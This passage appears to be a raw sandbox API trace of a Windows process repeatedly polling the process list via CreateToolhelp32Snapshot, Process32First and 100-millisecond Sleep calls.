CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0220.600] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0220.647] Sleep (dwMilliseconds=0x64) [0220.649] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0220.661] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0220.718] Sleep (dwMilliseconds=0x64) [0220.720] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0220.732] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0220.794] Sleep (dwMilliseconds=0x64) [0220.796] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0220.810] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0220.868] Sleep (dwMilliseconds=0x64) [0220.870] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0220.880] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0220.933] Sleep (dwMilliseconds=0x64) [0220.935] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0220.944] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0220.992] Sleep (dwMilliseconds=0x64) [0220.994] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0221.004] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.052] Sleep (dwMilliseconds=0x64) [0221.053] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0221.062] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.109] Sleep (dwMilliseconds=0x64) [0221.111] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0221.122] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.178] Sleep (dwMilliseconds=0x64) [0221.181] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0221.192] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.246] Sleep (dwMilliseconds=0x64) [0221.249] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0221.259] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.319] Sleep (dwMilliseconds=0x64) [0221.320] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0221.336] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.424] Sleep (dwMilliseconds=0x64) [0221.426] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0221.510] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.559] Sleep (dwMilliseconds=0x64) [0221.561] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0221.571] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.620] Sleep (dwMilliseconds=0x64) [0221.623] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0221.632] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.685] Sleep (dwMilliseconds=0x64) [0221.688] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0221.701] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.753] Sleep (dwMilliseconds=0x64) [0221.772] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0221.801] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.891] Sleep (dwMilliseconds=0x64) [0221.895] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0221.909] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.971] Sleep (dwMilliseconds=0x64) [0221.974] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0221.993] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0222.065] Sleep (dwMilliseconds=0x64) [0222.069] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0222.085] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0222.161] Sleep (dwMilliseconds=0x64) [0222.166] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0222.185] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0222.256] Sleep (dwMilliseconds=0x64) [0222.264] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0222.280] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0222.422] Sleep (dwMilliseconds=0x64) [0222.427] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0222.447] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0222.516] Sleep (dwMilliseconds=0x64) [0222.519] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0222.530] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0222.590] Sleep (dwMilliseconds=0x64) [0222.592] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0222.603] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0222.668] Sleep (dwMilliseconds=0x64) [0222.670] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0222.684] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0222.751] Sleep (dwMilliseconds=0x64) [0222.755] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0222.766] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0222.835] Sleep (dwMilliseconds=0x64) [0222.839] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0222.854] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0222.929] Sleep (dwMilliseconds=0x64) [0222.931] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0222.950] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0223.015] Sleep (dwMilliseconds=0x64) [0223.018] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0223.032] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0223.106] Sleep (dwMilliseconds=0x64) [0223.110] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0223.132] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0223.214] Sleep (dwMilliseconds=0x64) [0223.217] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0223.231] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0223.296] Sleep (dwMilliseconds=0x64) [0223.298] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0223.311] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0223.465] Sleep (dwMilliseconds=0x64) [0223.470] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0223.486] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0223.571] Sleep (dwMilliseconds=0x64) [0223.574] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0223.589] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0223.677] Sleep (dwMilliseconds=0x64) [0223.681] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0223.697] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0223.761] Sleep (dwMilliseconds=0x64) [0223.763] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0223.778] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0223.964] Sleep (dwMilliseconds=0x64) [0223.973] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0223.996] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0224.088] Sleep (dwMilliseconds=0x64) [0224.090] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0224.104] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0224.168] Sleep (dwMilliseconds=0x64) [0224.169] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0226.023] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.179] Sleep (dwMilliseconds=0x64) [0226.182] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0226.200] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.268] Sleep (dwMilliseconds=0x64) [0226.273] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0226.286] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.349] Sleep (dwMilliseconds=0x64) [0226.352] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0226.365] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.436] Sleep (dwMilliseconds=0x64) [0226.438] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0226.453] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.525] Sleep (dwMilliseconds=0x64) [0226.528] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0226.542] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.619] Sleep (dwMilliseconds=0x64) [0226.620] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0226.634] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.706] Sleep (dwMilliseconds=0x64) [0226.708] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0226.722] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.784] Sleep (dwMilliseconds=0x64) [0226.786] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0226.802] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.867] Sleep (dwMilliseconds=0x64) [0226.870] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0226.882] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.960] Sleep (dwMilliseconds=0x64) [0226.963] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0226.974] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.037] Sleep (dwMilliseconds=0x64) [0227.063] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0227.075] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.247] Sleep (dwMilliseconds=0x64) [0227.253] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0227.266] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.345] Sleep (dwMilliseconds=0x64) [0227.347] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0227.361] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.438] Sleep (dwMilliseconds=0x64) [0227.441] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0227.458] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.520] Sleep (dwMilliseconds=0x64) [0227.521] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0227.532] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.603] Sleep (dwMilliseconds=0x64) [0227.607] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0227.621] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.692] Sleep (dwMilliseconds=0x64) [0227.695] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0227.709] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.783] Sleep (dwMilliseconds=0x64) [0227.787] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0227.799] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.871] Sleep (dwMilliseconds=0x64) [0227.873] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0227.885] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.969] Sleep (dwMilliseconds=0x64) [0227.971] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0227.986] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, 